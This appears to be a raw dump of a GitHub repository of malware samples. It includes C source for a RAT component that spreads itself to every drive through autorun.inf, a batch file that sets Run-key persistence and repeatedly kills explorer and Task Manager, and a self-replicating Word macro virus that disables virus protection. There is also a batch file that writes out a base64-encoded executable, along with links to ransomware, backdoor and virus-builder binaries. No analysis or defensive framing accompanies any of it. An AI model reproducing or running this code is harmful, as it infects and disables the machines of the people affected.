58 | !ELSEIF "$(CFG)" == "AryanServerFWB - Win32 Debug"
59 |
60 | # PROP BASE Use_MFC 0
61 | # PROP BASE Use_Debug_Libraries 1
62 | # PROP BASE Output_Dir "Debug"
63 | # PROP BASE Intermediate_Dir "Debug"
64 | # PROP BASE Target_Dir ""
65 | # PROP Use_MFC 0
66 | # PROP Use_Debug_Libraries 1
67 | # PROP Output_Dir "Debug"
68 | # PROP Intermediate_Dir "Debug"
69 | # PROP Target_Dir ""
70 | # ADD BASE CPP /nologo /MTd /W3 /Gm /GX /ZI /Od /D "WIN32" /D "_DEBUG" /D "_WINDOWS" /D "_MBCS" /D "_USRDLL" /D "ARYANSERVERFWB_EXPORTS" /YX /FD /GZ /c
71 | # ADD CPP /nologo /MTd /W3 /Gm /GX /ZI /Od /D "WIN32" /D "_DEBUG" /D "_WINDOWS" /D "_MBCS" /D "_USRDLL" /D "ARYANSERVERFWB_EXPORTS" /YX /FD /GZ /c
72 | # ADD BASE MTL /nologo /D "_DEBUG" /mktyplib203 /win32
73 | # ADD MTL /nologo /D "_DEBUG" /mktyplib203 /win32
74 | # ADD BASE RSC /l 0x809 /d "_DEBUG"
75 | # ADD RSC /l 0x809 /d "_DEBUG"
76 | BSC32=bscmake.exe
77 | # ADD BASE BSC32 /nologo
78 | # ADD BSC32 /nologo
79 | LINK32=link.exe
80 | # ADD BASE LINK32 kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /nologo /dll /debug /machine:I386 /pdbtype:sept
81 | # ADD LINK32 kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /nologo /dll /debug /machine:I386 /pdbtype:sept
82 |
83 | !ENDIF
84 |
85 | # Begin Target
86 |
87 | # Name "AryanServerFWB - Win32 Release"
88 | # Name "AryanServerFWB - Win32 Debug"
89 | # Begin Group "Source Files"
90 |
91 | # PROP Default_Filter "cpp;c;cxx;rc;def;r;odl;idl;hpj;bat"
92 | # Begin Source File
93 |
94 | SOURCE=.\main.cpp
95 | # End Source File
96 | # End Group
97 | # Begin Group "Header Files"
98 |
99 | # PROP Default_Filter "h;hpp;hxx;hm;inl"
100 | # Begin Source File
101 |
102 | SOURCE=.\AryanServer.h
103 | # End Source File
104 | # Begin Source File
105 |
106 | SOURCE=.\hook.h
107 | # End Source File
108 | # Begin Source File
109 |
110 | SOURCE=.\resource.h
111 | # End Source File
112 | # Begin Source File
113 |
114 | SOURCE=.\tiny.h
115 | # End Source File
116 | # End Group
117 | # Begin Group "Resource Files"
118 |
119 | # PROP Default_Filter "ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe"
120 | # Begin Source File
121 |
122 | SOURCE=.\resource.rc
123 | # End Source File
124 | # End Group
125 | # End Target
126 | # End Project
127 |
--------------------------------------------------------------------------------
/AryanRAT/ServerA/AryanServerFWB.dsw:
--------------------------------------------------------------------------------
1 | Microsoft Developer Studio Workspace File, Format Version 6.00
2 | # WARNING: DO NOT EDIT OR DELETE THIS WORKSPACE FILE!
3 |
4 | ###############################################################################
5 |
6 | Project: "AryanServerFWB"=".\AryanServerFWB.dsp" - Package Owner=<4>
7 |
8 | Package=<5>
9 | {{{
10 | }}}
11 |
12 | Package=<4>
13 | {{{
14 | }}}
15 |
16 | ###############################################################################
17 |
18 | Global:
19 |
20 | Package=<5>
21 | {{{
22 | }}}
23 |
24 | Package=<3>
25 | {{{
26 | }}}
27 |
28 | ###############################################################################
29 |
30 |
--------------------------------------------------------------------------------
/AryanRAT/ServerA/AryanServerFWB.ncb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/AryanRAT/ServerA/AryanServerFWB.ncb
--------------------------------------------------------------------------------
/AryanRAT/ServerA/AryanServerFWB.opt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/AryanRAT/ServerA/AryanServerFWB.opt
--------------------------------------------------------------------------------
/AryanRAT/ServerA/AryanServerFWB.plg:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | Build Log
5 |
6 | --------------------Configuration: AryanServerFWB - Win32 Release--------------------
7 |
8 | Command Lines
9 | Creating temporary file "C:\DOCUME~1\ALBINO~1\LOCALS~1\Temp\RSPA60.tmp" with contents
10 | [
11 | kernel32.lib user32.lib gdi32.lib winspool.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib gdiplus.lib Winmm.lib /nologo /dll /incremental:no /pdb:"Release/AryanServerFWB.pdb" /machine:I386 /out:"Release/AryanServerFWB.dll" /implib:"Release/AryanServerFWB.lib"
12 | ".\Release\main.obj"
13 | ".\Release\resource.res"
14 | ]
15 | Creating command line "link.exe @C:\DOCUME~1\ALBINO~1\LOCALS~1\Temp\RSPA60.tmp"
16 | Output Window
17 | Linking...
18 | Creating library Release/AryanServerFWB.lib and object Release/AryanServerFWB.exp
19 | LINK : warning LNK4098: defaultlib "LIBCMT" conflicts with use of other libs; use /NODEFAULTLIB:library
20 |
21 |
22 |
23 | Results
24 | AryanServerFWB.dll - 0 error(s), 1 warning(s)
25 |
26 |
27 |
28 |
--------------------------------------------------------------------------------
/AryanRAT/ServerA/Spread.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include //for C references
3 | #include //for ProcessKill
4 |
5 | #include "Spread.h"
6 | DWORD WINAPI Drivespread(LPVOID p)
7 | {
8 |
9 | // int i;
10 | char autorun[] = "[autorun]"; //
11 | char start [] = "OPEN = Setup.exe"; //OPEN = Setup.exe
12 | char open[] = "ShellExecute=Setup.exe"; //ShellExecute=Setup.exe
13 | char drive_cnt,DropPath[32];
14 | int DriveType;
15 | char me[262];
16 | char TmpPath[MAX_PATH];
17 |
18 | GetTempPath(sizeof(TmpPath), TmpPath);
19 | wsprintf(me, "%s\21[05]1992.exe", TmpPath);
20 |
21 | for(drive_cnt = 'C';drive_cnt <= 'Z';drive_cnt++)
22 | {
23 | sprintf(DropPath,"%c:\\",drive_cnt);
24 | DriveType = GetDriveType(DropPath);
25 |
26 | if(DriveType != 0 && DriveType != 1)
27 | {
28 | strcat(DropPath,"Setup.exe");
29 | CopyFile(me,DropPath,true);
30 |
31 | FILE *file;
32 | file = fopen((DropPath,"autorun.inf"),"w+");
33 | fputs(autorun,file);
34 | fputs("\n",file);
35 | fputs(start,file);
36 | fputs("\n",file);
37 | fputs(open,file);
38 | fclose(file);
39 |
40 | }
41 |
42 | Sleep(30);
43 | }
44 | return 0;
45 | }
46 |
47 | int Spread()
48 | {
49 | DWORD dword;
50 | CreateThread(0,0,&Drivespread,0,0,&dword);
51 | return 0;
52 | }
--------------------------------------------------------------------------------
/AryanRAT/ServerA/Spread.h:
--------------------------------------------------------------------------------
1 | #ifndef _SPREAD_H_
2 | #define _SPREAD_H_
3 |
4 | int Spread();
5 |
6 | #endif
7 |
--------------------------------------------------------------------------------
/AryanRAT/ServerA/hook.h:
--------------------------------------------------------------------------------
1 | #ifndef _M_HOOK_h
2 | #define _M_HOOK_h
3 | //#define _WIN32_WINNT 0x0400
4 | #define DLLEXPORT __declspec(dllexport)
5 | #define WIN32_LEAN_AND_MEAN
6 | #define WH_KEYBOARD_LL 13
7 |
8 | typedef struct {
9 | DWORD vkCode;
10 | DWORD scanCode;
11 | DWORD flags;
12 | DWORD time;
13 | ULONG_PTR dwExtraInfo;
14 | } KBDLLHOOKSTRUCT, *PKBDLLHOOKSTRUCT;
15 |
16 | #endif // M_HOOK
--------------------------------------------------------------------------------
/AryanRAT/ServerA/resource.aps:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/AryanRAT/ServerA/resource.aps
--------------------------------------------------------------------------------
/AryanRAT/ServerA/resource.h:
--------------------------------------------------------------------------------
1 | //{{NO_DEPENDENCIES}}
2 | // Microsoft Developer Studio generated include file.
3 | // Used by resource.rc
4 | //
5 | #define IDC_FILE 108
6 | #define MAIN 110
7 |
8 | // Next default values for new objects
9 | //
10 | #ifdef APSTUDIO_INVOKED
11 | #ifndef APSTUDIO_READONLY_SYMBOLS
12 | #define _APS_NO_MFC 1
13 | #define _APS_3D_CONTROLS 1
14 | #define _APS_NEXT_RESOURCE_VALUE 111
15 | #define _APS_NEXT_COMMAND_VALUE 40001
16 | #define _APS_NEXT_CONTROL_VALUE 1062
17 | #define _APS_NEXT_SYMED_VALUE 101
18 | #endif
19 | #endif
20 |
--------------------------------------------------------------------------------
/AryanRAT/ServerA/resource.rc:
--------------------------------------------------------------------------------
1 | //Microsoft Developer Studio generated resource script.
2 | //
3 | #include "resource.h"
4 |
5 | #define APSTUDIO_READONLY_SYMBOLS
6 | /////////////////////////////////////////////////////////////////////////////
7 | //
8 | // Generated from the TEXTINCLUDE 2 resource.
9 | //
10 | #include "afxres.h"
11 |
12 | /////////////////////////////////////////////////////////////////////////////
13 | #undef APSTUDIO_READONLY_SYMBOLS
14 |
15 | /////////////////////////////////////////////////////////////////////////////
16 | // Russian resources
17 |
18 | #if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_RUS)
19 | #ifdef _WIN32
20 | LANGUAGE LANG_RUSSIAN, SUBLANG_DEFAULT
21 | #pragma code_page(1251)
22 | #endif //_WIN32
23 |
24 | #ifdef APSTUDIO_INVOKED
25 | /////////////////////////////////////////////////////////////////////////////
26 | //
27 | // TEXTINCLUDE
28 | //
29 |
30 | 1 TEXTINCLUDE DISCARDABLE
31 | BEGIN
32 | "resource.h\0"
33 | END
34 |
35 | 2 TEXTINCLUDE DISCARDABLE
36 | BEGIN
37 | "#include ""afxres.h""\r\n"
38 | "\0"
39 | END
40 |
41 | 3 TEXTINCLUDE DISCARDABLE
42 | BEGIN
43 | "\r\n"
44 | "\0"
45 | END
46 |
47 | #endif // APSTUDIO_INVOKED
48 |
49 | #endif // Russian resources
50 | /////////////////////////////////////////////////////////////////////////////
51 |
52 |
53 | /////////////////////////////////////////////////////////////////////////////
54 | // English (U.K.) resources
55 |
56 | #if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_ENG)
57 | #ifdef _WIN32
58 | LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_UK
59 | #pragma code_page(1252)
60 | #endif //_WIN32
61 |
62 | /////////////////////////////////////////////////////////////////////////////
63 | //
64 | // Dialog
65 | //
66 |
67 | MAIN DIALOG DISCARDABLE 0, 0, 1, 0
68 | STYLE DS_MODALFRAME | DS_CENTER | WS_POPUP | WS_CAPTION | WS_SYSMENU
69 | CAPTION "R.A.T - Remote Administration Tool (Client)"
70 | FONT 8, "MS Sans Serif"
71 | BEGIN
72 | END
73 |
74 | IDC_FILE DIALOG DISCARDABLE 0, 0, 1, 0
75 | STYLE DS_MODALFRAME | WS_POPUP | WS_CAPTION | WS_SYSMENU
76 | CAPTION "Dialog"
77 | FONT 8, "MS Sans Serif"
78 | BEGIN
79 | END
80 |
81 | #endif // English (U.K.) resources
82 | /////////////////////////////////////////////////////////////////////////////
83 |
84 |
85 |
86 | #ifndef APSTUDIO_INVOKED
87 | /////////////////////////////////////////////////////////////////////////////
88 | //
89 | // Generated from the TEXTINCLUDE 3 resource.
90 | //
91 |
92 |
93 | /////////////////////////////////////////////////////////////////////////////
94 | #endif // not APSTUDIO_INVOKED
95 |
96 |
--------------------------------------------------------------------------------
/AryanRAT/ServerA/tiny.h:
--------------------------------------------------------------------------------
1 |
2 | //////////////////////////////
3 | // Version 1.10
4 | // Jan 23rd, 2000
5 | // Version 1.00
6 | // May 20th, 1999
7 | // Todd C. Wilson, Fresh Ground Software
8 | // (todd@nopcode.com)
9 | // This header file will kick in settings for Visual C++ 5 and 6 that will (usually)
10 | // result in smaller exe's.
11 | // The "trick" is to tell the compiler to not pad out the function calls; this is done
12 | // by not using the /O1 or /O2 option - if you do, you implicitly use /Gy, which pads
13 | // out each and every function call. In one single 500k dll, I managed to cut out 120k
14 | // by this alone!
15 | // The other two "tricks" are telling the Linker to merge all data-type segments together
16 | // in the exe file. The relocation, read-only (constants) data, and code section (.text)
17 | // sections can almost always be merged. Each section merged can save 4k in exe space,
18 | // since each section is padded out to 4k chunks. This is very noticable with smaller
19 | // exes, since you could have only 700 bytes of data, 300 bytes of code, 94 bytes of
20 | // strings - padded out, this could be 12k of runtime, for 1094 bytes of stuff!
21 | // Note that if you're using MFC static or some other 3rd party libs, you may get poor
22 | // results with merging the readonly (.rdata) section - the exe may grow larger.
23 | // To use this feature, define _MERGE_DATA_ in your project or before this header is used.
24 | // With Visual C++ 5, the program uses a file alignement of 512 bytes, which results
25 | // in a small exe. Under VC6, the program instead uses 4k, which is the same as the
26 | // section size. The reason (from what I understand) is that 4k is the chunk size of
27 | // the virtual memory manager, and that WinAlign (an end-user tuning tool for Win98)
28 | // will re-align the programs on this boundary. The problem with this is that all of
29 | // Microsoft's system exes and dlls are not tuned like this, and using 4k causes serious
30 | // exe bloat. Very noticable for smaller programs.
31 | // The "trick" for this is to use the undocumented FILEALIGN linker parm to change the
32 | // padding from 4k to 1/2k, which results in a much smaller exe - anywhere from 20%-75%
33 | // depending on the size.
34 |
35 |
36 | #ifdef NDEBUG
37 | // /Og (global optimizations), /Os (favor small code), /Oy (no frame pointers)
38 | #pragma optimize("gsy",on)
39 |
40 | #pragma comment(linker,"/RELEASE")
41 |
42 | // Note that merging the .rdata section will result in LARGER exe's if you using
43 | // MFC (esp. static link). If this is desirable, define _MERGE_RDATA_ in your project.
44 | #ifdef _MERGE_RDATA_
45 | #pragma comment(linker,"/merge:.rdata=.data")
46 | #endif // _MERGE_RDATA_
47 |
48 | #pragma comment(linker,"/merge:.text=.data")
49 | #pragma comment(linker,"/merge:.reloc=.data")
50 |
51 | #if _MSC_VER >= 1000
52 | // Only supported/needed with VC6; VC5 already does 0x200 for release builds.
53 | // Totally undocumented! And if you set it lower than 512 bytes, the program crashes.
54 | // Either leave at 0x200 or 0x1000
55 | #pragma comment(linker,"/FILEALIGN:0x200")
56 | #endif // _MSC_VER >= 1000
57 |
58 | #endif // NDEBUG
59 |
60 | //#pragma comment(linker,"/ENTRY:WinMain")
61 | #pragma comment(linker,"/MERGE:.rdata=.data")
62 | #pragma comment(linker,"/MERGE:.text=.data")
63 | #pragma comment(lib,"msvcrt.lib")
64 | #if (_MSC_VER < 1300)
65 | #pragma comment(linker,"/IGNORE:4078")
66 | #pragma comment(linker,"/OPT:NOWIN98")
67 | #endif
68 | #define WIN32_LEAN_AND_MEAN
69 |
--------------------------------------------------------------------------------
/Backdoor/Backdoor(na)(np).exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/Backdoor/Backdoor(na)(np).exe
--------------------------------------------------------------------------------
/Backdoor/Backdoor(na).exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/Backdoor/Backdoor(na).exe
--------------------------------------------------------------------------------
/Backdoor/Backdoor(np).exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/Backdoor/Backdoor(np).exe
--------------------------------------------------------------------------------
/Backdoor/Backdoor.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/Backdoor/Backdoor.exe
--------------------------------------------------------------------------------
/CODEEVO/CODEEVO.bat:
--------------------------------------------------------------------------------
1 | @echo off
2 |
3 | mode 80, 33
4 |
5 | start cmd.exe
6 |
7 | cls
8 |
9 | :skull
10 |
11 | :a
12 | REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "CODE EVO" /t REG_SZ /F /D "%~dp0\CODEEVO.exe"
13 | REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "CODE EVO" /t REG_SZ /F /D "%~dp0\CODEEVO.exe"
14 | REG ADD "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "CODE EVO" /t REG_SZ /F /D "%~dp0\CODEEVO.exe"
15 | REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "CODE EVO" /t REG_SZ /F /D "%~dp0\CODEEVO.exe"
16 | start cmd.exe
17 | TSKILL explorer
18 | TSKILL explorer.exe
19 | TASKKILL /IM /f explorer
20 | TASKKILL /IM /f explorer.exe
21 | TSKILL taskmgr
22 | TSKILL taskmgr.exe
23 | TASKKILL /IM /f taskmgr
24 | TASKKILL /IM /f taskmgr.exe
25 | goto a
26 |
27 | echo .,od88888888888bo,.
28 | echo .d88888888888888888888888b.
29 | echo .d88888888888888888888888888888b.
30 | echo .d888888888888888888888888888888888b.
31 | echo .d8888888888888888888888888888888888888b.
32 | echo d88888888888888888888888888888888888888888b
33 | echo d8888888888888888888888888888888888888888888b
34 | echo d888888888888888888888888888888888888888888888
35 | echo 8888888888888888888888888888888888888888888888
36 | echo 8888888888888888888888888888888888888888888888
37 | echo 8888888888888888888888888888888888888888888888
38 | echo Y88888888888888888888888888888888888888888888P
39 | echo "8888888888P' "Y8888888888P" "Y888888888"
40 | echo 88888888P Y88888888P Y88888888
41 | echo Y8888888 ]888888P 8888888P
42 | echo Y888888 d888888b 888888P
43 | echo Y88888b d88888888b d88888P
44 | echo Y888888b. .d88888888888b. .d888888
45 | echo Y8888888888888888P Y8888888888888888
46 | echo 888888888888888P Y88888888888888
47 | echo "8888888888888[ ]888888888888"
48 | echo "Y888888888888888888888888P"
49 | echo "Y88888888888888P"
50 | echo 888b Y8888888888P d888
51 | echo "888b d888"
52 | echo Y888bo. .od888P
53 | echo Y888888888888888888P
54 | echo "Y88888888888888P"
55 | echo "Y8888888888P"
56 | echo "Y888888P"
57 | echo """"
58 |
59 | PING 1.1.1.1 -n 1 -w 500>nul
60 |
61 | cls
62 |
63 | echo .,od88888888888bo,.
64 | echo .d88888888888888888888888b.
65 | echo .d88888888888888888888888888888b.
66 | echo .d888888888888888888888888888888888b.
67 | echo .d8888888888888888888888888888888888888b.
68 | echo d88888888888888888888888888888888888888888b
69 | echo d8888888888888888888888888888888888888888888b
70 | echo d888888888888888888888888888888888888888888888
71 | echo 8888888888888888888888888888888888888888888888
72 | echo 8888888888888888888888888888888888888888888888
73 | echo 8888888888888888888888888888888888888888888888
74 | echo Y88888888888888888888888888888888888888888888P
75 | echo "8888888888P' "Y8888888888P" "Y888888888"
76 | echo 88888888P Y88888888P Y88888888
77 | echo Y8888888 ]888888P 8888888P
78 | echo Y888888 d888888b 888888P
79 | echo Y88888b d88888888b d88888P
80 | echo Y888888b. .d88888888888b. .d888888
81 | echo Y8888888888888888P Y8888888888888888
82 | echo 888888888888888P Y88888888888888
83 | echo "8888888888888[ ]888888888888"
84 | echo "Y888888888888888888888888P"
85 | echo "Y88888888888888P"
86 | echo Y8888888888P
87 | echo 888b d888
88 | echo "888b d888"
89 | echo Y888bo. .od888P
90 | echo Y888888888888888888P
91 | echo "Y88888888888888P"
92 | echo "Y8888888888P"
93 | echo "Y888888P"
94 | echo """"
95 |
96 | PING 1.1.1.1 -n 1 -w 500>nul
97 |
98 | cls
99 |
100 | goto skull
--------------------------------------------------------------------------------
/CODEEVO/CODEEVO.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/CODEEVO/CODEEVO.exe
--------------------------------------------------------------------------------
/CODEEVO/icon.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/CODEEVO/icon.ico
--------------------------------------------------------------------------------
/CryptoLocker 2014/1002.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/CryptoLocker 2014/1002.exe
--------------------------------------------------------------------------------
/CryptoLocker 2014/1003.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/CryptoLocker 2014/1003.exe
--------------------------------------------------------------------------------
/D3STR0Y3R (test)/D3STR0Y3R.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/D3STR0Y3R (test)/D3STR0Y3R.exe
--------------------------------------------------------------------------------
/D3STR0Y3R (test)/disableav.bat:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/D3STR0Y3R (test)/disableav.bat
--------------------------------------------------------------------------------
/D3STR0Y3R (test)/millionfoldermod.bat:
--------------------------------------------------------------------------------
1 | @ echo off:topmd %random%goto top
--------------------------------------------------------------------------------
/DELmE/DELmE_s Batch Virus Generator v 2.0.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/DELmE/DELmE_s Batch Virus Generator v 2.0.exe
--------------------------------------------------------------------------------
/DarkHorse VM/COMCTL32.OCX:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/DarkHorse VM/COMCTL32.OCX
--------------------------------------------------------------------------------
/DarkHorse VM/DarkHorseTrojanVirusMaker.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/DarkHorse VM/DarkHorseTrojanVirusMaker.exe
--------------------------------------------------------------------------------
/ERROR/Error.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/ERROR/Error.exe
--------------------------------------------------------------------------------
/Hotbest/hotbest.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/Hotbest/hotbest.exe
--------------------------------------------------------------------------------
/Killsight/XXX.docx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/Killsight/XXX.docx
--------------------------------------------------------------------------------
/Killsight/wordmacromalware.Killsight.txt:
--------------------------------------------------------------------------------
1 | Private Sub Document_Close()
2 | Rem
3 | Rem ProgramName "Killsight"
4 | Call Document_Open
5 | End Sub
6 | Private Sub Document_New()
7 | Call Document_Open
8 | End Sub
9 | Private Sub Document_Open()
10 | On Error Resume Next
11 | Application.DisplayAlerts = wdAlertsNone
12 | WordBasic.DisableAutoMakros 0
13 | Options.VirusProtection = False
14 | NormInstalled = False
15 | ActInstalled = False
16 | If NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(2, 1) = "Rem" Then NormInstalled = True
17 | If ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(2, 1) = "Rem" Then ActInstalled = True
18 | If NormInstalled = True And ActInstalled = True Then GoTo Killer
19 | If NormInstaller = False Then
20 | Set Inf = NormalTemplate.VBProject.VBComponents(1).CodeModule
21 | Set Noc = ActiveDocument.VBProject.VBComponents(1).CodeModule
22 | Else
23 | Set Inf = ActiveDocument.VBProject.VBComponents(1).CodeModule
24 | Set Noc = NormalTemplate.VBProject.VBComponents(1).CodeModule
25 | End If
26 | With Noc
27 | Code = .Lines(1, .CountOfLines)
28 | End With
29 | With Inf
30 | .DeleteLines 1, .CountOfLines
31 | .InsertLines 1, Code
32 | End With
33 | Application.DisplayAlerts = wdAlertsAll
34 | ''WordBasic.Kill "c:\Windows\*.*"
35 | Exit Sub
36 | Killer:
37 | ActiveWindow.Caption = "Killsight Activated."
38 | Set ULTRAS = ActiveDocument.Range(Start:=0, End:=0)
39 | With ULTRAS
40 | .InsertBefore "Killsight Activated." + Chr(13)
41 | .Font.Size = 50
42 | .Font.Name = "Stencil"
43 | .Font.ColorIndex = wdGreen
44 | .Font.Shadow = 1
45 | .Font.Animation = wdAnimationLasVegasLights
46 | End With
47 | AutoCorrect.Entries.Add Name:=".", Value:=" Dick "
48 | AutoCorrect.Entries.Add Name:=",", Value:=" Schlong "
49 | AutoCorrect.Entries.Add Name:="?", Value:=" Erotic.org "
50 | AutoCorrect.Entries.Add Name:="!", Value:=" Harakiri "
51 | AutoCorrect.Entries.Add Name:="@", Value:=" Seppuku "
52 | AutoCorrect.Entries.Add Name:="7", Value:=" 2+2=5 "
53 | End If
54 | End Sub
--------------------------------------------------------------------------------
/MEMZ/MEMZ.bat:
--------------------------------------------------------------------------------
1 | @echo off
2 |
3 | echo UEsDBBQAAAAIAHV36kiQ6IfZcyEAAAA6AAAIAAAATUVNWi5leGXtew10U8e17kg6soUtjACbGGzi>x
4 | echo AxgMyD9Hlm1sY4JkW2AH/wjLP5BgB9k6RhKSjqIfbKcJyBgaqw65tM1NIJckNE1705Tcpi3JJWma>>x
5 | echo OD830Da0TptFSQOpXx7NFSnhmYRbnIRw3jfnyMZpfmCt99b7WauzvM+c2TOz95699+zZIw71t+wl>>x
6 | echo KkIIAxBFQo4QuZjItctJQErWcynk8LTjC44o6o4vaHa6gqw/IGwJ2L1sl93nE0JsJ88Gwj7W5WOr>>x
7 | echo G22sV3Dw+dOnJ2XHaTxj9pZ/yKpcE/Dphr2uz6R3pet3qDdvT3BekurLro+kWuGkdZOry0nHf5Vs>>x
8 | echo VgshdQo1eXHNzrYJ3ChRKpIVKYRo0Vgu4/Jm4aEDsPFV03clIWqikPonahKJK0nqNu2WBtKxk/Vk>>x
9 | echo JZXDKwk5SF82ExJTfImAfogBPnvLCSm9Dl1PFsip+zJ68ZIf4ntDdHnJcYG0V+WeQmJzfsBhD9kJ>>x
10 | echo eXmBjCAL/24BRNKGKV8eRu6jPK1E0g0p/MK44fxAMNBF4mvdHB9X9CX0ArxH6JLXTnUgyVbyhXGV>>x
11 | echo X73Cf5T/naVl6NzAXVpdaDqec0KJ7eLiU6yJxBLQZRxuf1lHWtvcqR1Gsa2tzXlFZyJO6iRtYpoD>>x
12 | echo o9wOMc2EeuC8Ivzn2zrOTtA7l2lrbXPuKjMRMa0I/UPFEfocd94DVJt4wnmQ1kMnxRNGcWhs99uh>>x
13 | echo hbv/Frpxj0W0trkV7tniH/ZYLlrdCZQlvHJYPDHw6tI9lnGre6mY5gElq5hGUO2xxKzOwxLJNA3a>>x
14 | echo GL/Hcuao5Yzkqm1iePyoZYy6mZjGoNuZiK3sThDTRtG4rePWob+0v9Iqpm2mBN3E+cZcLEgNygsw>>x
15 | echo VIdFOitWQOixWME0qOL3l4pHlmM9Rf98zIpxIPk65mH6MVTG4Y6XGbry/nMV4GdrNb7dFm2/+Au6>>x
16 | echo B2xuk5jWi0E2a9QyFpc/9gRoOmMqKhpVoJu4lbFdwA2NH9396meimIuZe6Q3a1vsdtrRPmb8m/j0>>x
17 | echo 68BAVrppxDQ/XRTl4TZFLZdlLlLbKoYvRy3jsWpMhBZsYlouunYPhxVr0COmLUULeDEtRLU4wUaH>>x
18 | echo 0RjzYJs8YGX44l3q2BX0RcMX3Ulnm0RRlIzrsLUOFY/QZb/dZhNPuBXf37Ue9E58f3A9tcllWKdC>>x
19 | echo NtJe6ht3XVbMuPcvMIkzG/oU/YyYxknSzNg9CNvYbDbnzTOhHpvsU3ssjx+1PM6h54VSjD9qeYrA>>x
20 | echo 66zR8Ei0/VC0/XC0/Ui0/flo+3C0/dVo+7Fo++vR9jfFtJNUwyhuh9tB61aQe1Nyvct4/jV1j+Uk>>x
21 | echo BIpJDOjbGXm81Dixe3jHnzFVhT8nGA87HZLr3knnn4y2jw98KoY1bqWY5pQ0TN0oblTqv2WrYstM>>x
22 | echo ZFv6c+nwnKHf6k98i0laO6gwr5TwgQvGX5VNP0dHzPlWf81CExnclXIF6jCvlLCB992EurtEttU2>>x
23 | echo ND+bGucPMATjVv31HphpaJVkrz/C7hFI51bCW+Jy9l6Vc2zgihhOdDNnW0XqIpSkWPw6XNY5tow6>>x
24 | echo KqWY6FafXYHuVhBLMr5tk+Y7TxXK2t8HMmXzTwE19OnQfOqW25a+wFHTbmPEPxiHrdZWp34ebGGV>>x
25 | echo LbV24DXNylV0fOC0U5cDV/vDXy8NFdN98SLdOu6iNmcNavjIwHiCbG2KGy2dwIV7nTTWTyjTSc+h>>x
26 | echo oTFqulK6KdS3uZNskte0Uvnuo970PxTh9/dYDhy1HKigmzwaPgQP2VBGHeUgSJFo+2PR9sclP3n+>>x
27 | echo qOVIkrT7D1DiVHdiGK5STU1/tuCK5M7r17uToE8Sq1XLu1y3QNrlBLvcOVomb3WqmdhSDNj/7DFQ>>x
28 | echo ufRxtOXy25bLp9vHT1vG37Zo5JdTxRvKTeSUmqPPVRHp3YnnOy/FDmIuDTcSQ8RGGszEtKeo3Sza>>x
29 | echo Z/dpQPnSx3v8ytgrDH29MvRJ7Nn424exn+DNrdp/66VPb57xkz+qWi43xQ5InbR9QtUy3iSmHaL6>>x
30 | echo Um6IRzVpm+pasZEPS3EXL+ckH9ljGUNcTHtMYnzZ+Cu95aJTQ4xk/fpW65BlXI9uvIpp6TS2YeCr>>x
31 | echo UpAH2UnhqRtYnffNjR8EcVeIJVMZb9y/8atUM33pFNUMSu+bZdXsZmTVwLsr5lJvPizHjiOUdeGG>>x
